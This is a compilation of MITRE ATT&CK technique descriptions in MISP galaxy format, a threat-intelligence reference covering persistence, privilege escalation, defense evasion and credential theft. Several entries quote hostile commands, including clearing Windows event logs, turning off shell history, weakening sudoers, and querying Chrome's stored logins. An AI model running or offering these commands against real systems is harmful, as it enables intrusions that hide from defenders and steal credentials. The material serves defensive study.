For example, an unwanted Certification Authority (CA) certificate could be placed in the device's trusted certificate store, increasing the device's susceptibility to man-in-the-middle network attacks seeking to eavesdrop on or manipulate the device's network communication ([Eavesdrop on Insecure Network Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device Communication](https://attack.mitre.org/techniques/T1463)).

On iOS, malicious Configuration Profiles could contain unwanted Certification Authority (CA) certificates or other insecure settings such as unwanted proxy server or VPN settings to route the device's network traffic through an adversary's system. The device could also potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: Talos-MDM).

The tag is: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"

Table 3029. Table References

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Steal or Forge Kerberos Tickets - T1558

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).

Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC). Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

The tag is: `misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558"`

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Aggregate individual’s digital footprint - T1275

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1275).

In addition to a target’s social media presence may exist a larger digital footprint, such as accounts and credentials on e-commerce sites or usernames and logins for email. An adversary familiar with a target’s username can mine to determine the target’s larger digital footprint via publicly available sources. (Citation: DigitalFootprint) (Citation: trendmicro-vtech)

The tag is: `misp-galaxy:mitre-attack-pattern="Aggregate individual’s digital footprint - T1275"`
Domain Generation Algorithms (DGA) - T1323

This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).

The use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)

The tag is: `misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms (DGA) - T1323"

Unconditional client-side exploitation/Injected Website/Driveby - T1372

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit's landing page. The exploit kit landing page will probe the victim’s operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)

The tag is: `misp-galaxy:mitre-attack-pattern="Unconditional client-side exploitation/Injected Website/Driveby - T1372"

LLMNR/NBT-NS Poisoning and Relay - T1171

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)

Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoof) (Citation: GitHub Responder)

The tag is: *misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171"

**LLMNR/NBT-NS Poisoning and Relay - T1171** has relationships with:

- revoked-by: *misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"* with estimative-language:likelihood-probability="almost-certain"

**Table 3034. Table References**

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<td><a href="https://github.com/Kevin-Robertson/Conveigh">https://github.com/Kevin-Robertson/Conveigh</a></td>
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**OS-vendor provided communication channels - T1390**

This object is deprecated as its content has been merged into the enterprise domain. Please see the
Google and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)

The tag is: `misp-galaxy:mitre-attack-pattern="OS-vendor provided communication channels - T1390"`

### Rogue Wi-Fi Access Points - T1465

An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).

The tag is: `misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465"`

### Clear Windows Event Logs - T1070.001

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer’s alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

- `<code>wevtutil cl system</code>`
- `<code>wevtutil cl application</code>`
- `<code>wevtutil cl security</code>`
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).

The tag is: `misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001"`

**Table 3037. Table References**

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**Network Share Connection Removal - T1070.005**

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the `<code>net use \system\share /delete</code>` command.

(Citation: Technet Net Use)

The tag is: `misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005"`

**Table 3038. Table References**

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**Distributed Component Object Model - T1021.003**

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.

(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.

(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.

(Citation: Microsoft COM)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods. (Citation: Enigma MMC20 COM Jan 2017) (Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.

The tag is: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003"

Table 3039. Table References

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Network Device Configuration Dump - T1602.002

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.
Table 3040. Table References

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**Indicator Removal from Tools - T1027.005**

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.

Table 3041. Table References

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**Exchange Email Delegate Permissions - T1098.002**

Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)

The tag is: *misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002"*
Masquerade Task or Service - T1036.004

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"

Archive via Custom Method - T1560.003

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003"
Extra Window Memory Injection - T1055.011

Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011"
Create Process with Token - T1134.002

Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with `<code>DuplicateToken(Ex)</code>` and use it with `<code>CreateProcessWithTokenW</code>` to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.

The tag is: `misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002"`

Table 3046. Table References

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Disable or Modify Tools - T1562.001

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.

The tag is: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"`

Table 3047. Table References

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Compromise Software Supply Chain - T1195.002

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the
update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)

The tag is: *misp-galaxy:mitre-attack-pattern=“Compromise Software Supply Chain - T1195.002”*

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<td>to-a-possible-third-stage-that-had-keylogger-capacities</td>
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### Make and Impersonate Token - T1134.003

Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the `<code>LogonUser</code>` function. The function will return a copy of the new session's access token and the adversary can use `<code>SetThreadToken</code>` to assign the token to a thread.

The tag is: *misp-galaxy:mitre-attack-pattern=“Make and Impersonate Token - T1134.003”*

### Compromise Hardware Supply Chain - T1195.003

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.

The tag is: *misp-galaxy:mitre-attack-pattern=“Compromise Hardware Supply Chain - T1195.003”*
Change Default File Association - T1546.001

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:

* <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001"

Table 3051. Table References

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Hidden Files and Directories - T1564.001

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “." as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, '.', are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.

Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.

The tag is: **misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"**

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**DLL Search Order Hijacking - T1574.001**

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) (Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. (Citation: FireEye fxstt June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"

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**Services File Permissions Weakness - T1574.010**

Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

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**Exfiltration to Code Repository - T1567.001**

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

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**Network Address Translation Traversal - T1599.001**

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)

When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change
the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities

The tag is: `misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001"`

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**Disable Windows Event Logging - T1562.002**

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more. (Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.

Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

The tag is: `misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002"`

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**Impair Command History Logging - T1562.003**

Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.

On Linux and macOS, command history is tracked in a file pointed to by the environment variable `<code>HISTFILE</code>`. When a user logs off a system, this information is flushed to a file in the user's home directory called `<code>~/.bash_history</code>`. The `<code>HISTCONTROL</code>` environment variable keeps track of what should be saved by the `<code>history</code>` command and eventually into the `<code>~/.bash_history</code>` file when a user logs out. `<code>HISTCONTROL</code>` does not exist by default on macOS, but can be set by the user and will be respected.

Adversaries may clear the history environment variable ( `<code>unset HISTFILE</code>`) or set the command history size to zero ( `<code>export HISTFILESIZE=0</code>`) to prevent logging of commands. Additionally, `<code>HISTCONTROL</code>` can be configured to ignore commands that start with a space by simply setting it to “ignorespace”. `<code>HISTCONTROL</code>` can also be set
to ignore duplicate commands by setting it to "ignoreups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that "ls" will not be saved, but "ls" would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.

On Windows systems, the `<code>PSReadLine</code>` module tracks commands used in all PowerShell sessions and writes them to a file `<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code>` by default. Adversaries may change where these logs are saved using `<code>Set-PSReadLineOption -HistorySavePath {File Path}</code>`. This will cause `<code>ConsoleHost_history.txt</code>` to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command `<code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>`.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

The tag is: `misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003"`

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### Bypass User Account Control - T1548.002

Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be
injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows)

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

- `<code>eventvwr.exe</code>` can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity. (Citation: SANS UAC Bypass)

The tag is: `misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002"

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**User Activity Based Checks - T1497.002**

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016), browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002"

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Cloud Instance Metadata API - T1552.005

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:\]//169.254.169.254</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005"

Table 3061. Table References

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Exfiltration to Cloud Storage - T1567.002

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002"

Table 3062. Table References

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Sudo and Sudo Caching - T1548.003

Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users...
for passwords with a line like `<code>user1 ALL=(ALL) NOPASSWD: ALL</code>` (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, `<code>/var/db/sudo</code>`'s timestamp can be monitored to see if it falls within the `<code>timestamp_timeout</code>` range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if `<code>tty_tickets</code>` is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled `<code>tty_tickets</code>` to potentially make scripting easier by issuing `<code>echo 'Defaults !tty_tickets' &gt;&gt; /etc/sudoers</code>` (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued `<code>killall Terminal</code>`. As of macOS Sierra, the sudoers file has `<code>tty_tickets</code>` enabled by default.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003"

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**Credentials from Web Browsers - T1555.003**

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, `<code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code>` and executing a SQL query: `<code>SELECT action_url, username_value, password_value FROM logins;</code>`. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function `<code>CryptUnprotectData</code>`, which uses the victim's cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)

Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
